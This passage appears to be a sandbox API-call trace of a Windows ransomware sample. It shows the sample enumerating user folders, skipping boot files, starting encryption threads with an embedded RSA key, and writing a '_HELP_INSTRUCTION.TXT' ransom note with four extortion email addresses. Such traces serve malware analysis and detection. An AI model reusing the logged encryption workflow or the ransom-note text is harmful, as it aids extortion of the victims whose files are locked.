StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0195.193] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0195.193] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0195.193] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0195.193] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.193] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D5D72CD040472A6053677EF544680EA8.XZZX" | out: lpString1="D5D72CD040472A6053677EF544680EA8.XZZX") returned="D5D72CD040472A6053677EF544680EA8.XZZX" [0195.193] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd08 [0195.194] Sleep (dwMilliseconds=0x96) [0195.349] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.349] lstrcmpW (lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpString2="..") returned 1 [0195.349] lstrcmpW (lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpString2=".") returned 1 [0195.349] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0195.349] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="ntldr") returned 0x0 [0195.349] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="NTLDR") returned 0x0 [0195.349] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0195.349] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0195.349] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0195.349] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0195.349] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.349] lstrcpyW (in: lpString1=0x17cf1c, lpString2="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" | out: lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" [0195.349] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd0c [0195.350] Sleep (dwMilliseconds=0x96) [0195.507] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.507] lstrcmpW (lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpString2="..") returned 1 [0195.507] lstrcmpW (lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpString2=".") returned 1 [0195.507] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0195.507] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="ntldr") returned 0x0 [0195.507] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="NTLDR") returned 0x0 [0195.507] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0195.507] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="ntdetect.com") returned 0x0 [0195.507] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0195.507] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0195.508] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.508] lstrcpyW (in: lpString1=0x17cf1c, lpString2="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" | out: lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" [0195.508] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.508] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd10 [0195.508] Sleep (dwMilliseconds=0x96) [0195.661] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.661] lstrcmpW (lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX", lpString2="..") returned 1 [0195.661] lstrcmpW (lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX", lpString2=".") returned 1 [0195.661] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0195.661] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="ntldr") returned 0x0 [0195.661] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="NTLDR") returned 0x0 [0195.661] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0195.661] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0195.661] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0195.661] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0195.661] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.661] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FBB049370C08D85D799956BD1029BCA5.XZZX" | out: lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX") returned="FBB049370C08D85D799956BD1029BCA5.XZZX" [0195.661] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd14 [0195.661] Sleep (dwMilliseconds=0x96) [0195.816] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.816] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0195.816] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0195.817] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0195.817] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0195.817] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0195.817] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0195.817] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0195.817] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0195.817] SetErrorMode (uMode=0x1) returned 0x1 [0195.817] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_HELP_INSTRUCTION.TXT") returned 60 [0195.817] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0195.817] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0195.817] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd18) returned 0x0 [0195.817] RegQueryValueExW (in: hKey=0xd18, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43af7a8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43af7a8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0195.817] RegCloseKey (hKey=0xd18) returned 0x0 [0195.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0195.818] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0195.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd18 [0195.818] CloseHandle (hObject=0xd18) returned 1 [0195.818] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0195.818] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="Pictures" [0195.818] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0195.818] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0195.818] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.818] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.819] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.820] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.820] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.820] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.820] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.820] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.820] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.820] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0195.821] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0195.821] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0195.821] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0195.821] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0195.821] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0195.821] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0195.821] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0195.822] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0195.822] SetErrorMode (uMode=0x1) returned 0x1 [0195.822] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0195.822] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0195.822] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0195.822] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*" [0195.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0195.822] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0195.822] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0195.822] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*" [0195.822] SetErrorMode (uMode=0x1) returned 0x1 [0195.822] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\_HELP_INSTRUCTION.TXT") returned 61 [0195.822] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0195.822] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0195.822] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd1c) returned 0x0 [0195.822] RegQueryValueExW (in: hKey=0xd1c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43af9d8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43af9d8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0195.822] RegCloseKey (hKey=0xd1c) returned 0x0 [0195.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0195.823] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as 